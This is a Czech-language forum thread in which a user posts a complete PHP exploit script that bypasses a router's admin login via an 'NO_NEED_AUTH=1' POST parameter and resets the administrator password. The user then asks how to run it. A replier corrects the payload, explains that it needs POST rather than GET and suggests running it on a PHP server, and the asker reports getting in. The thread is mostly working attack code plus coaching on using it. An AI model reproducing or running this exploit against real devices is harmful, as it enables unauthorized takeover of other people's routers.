Přidat otázku mezi oblíbenéZasílat nové odpovědi e-mailem Jak spustit PHP skript?

Dobrý den,

testuji jestli je můj router odolný proti útokům a a prý by se do něj šlo dostat tímto PHP skriptem:

<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AU
TH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3])
);
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
echo "- Error: could not connect (
http://$argv[1]:$argv[2]/tools_admin.php).\n";
exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"Successfully")===false) {
echo "- something goes wrong (check answer - answer.html) !\n";
$f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
exit;
}
else
echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>

Je to možné ? A vysvětlila by mi nějaká dobrá duše jak to nechám ten router "sežrat" ? Děkuji!

Zkusil jsem tedy zadat do prohlížeče:

http://192.168.0.1/tools_admin.php?LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=NOVEHESLO

a vypadá to že se nezměnilo. Buď má firmware tuhle bezpečností díru opravenou a nebo jsem udělal něco špatně?

Děkuji.

No jedna vec je ze nie som si isty ci nema byt na zaciatku to Action_post,

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=NECO

a druha vec je ze ten PHP script to posiela sposobom POST, a ne z URL riadku (to je metoda GET), a to neni to same.

Ked to chces silou mocou testovat nainstaluj si nejaky PHP server janeviem apache a spust si ten php script v nom. Ale upozornujem ze nastavit PHP server neni uplne trivialna vec pre zaciatocnikov.

Dle mého názoru, by pomohlo jen update firmwaru nebo DD-WRT. Router je můj a ano děkuji vám :) Je to moje první zařízení do kterého jsem se dokázal dostat bez nějakého programu, teda vy jste mi pomohl, ale stejně je to úspěch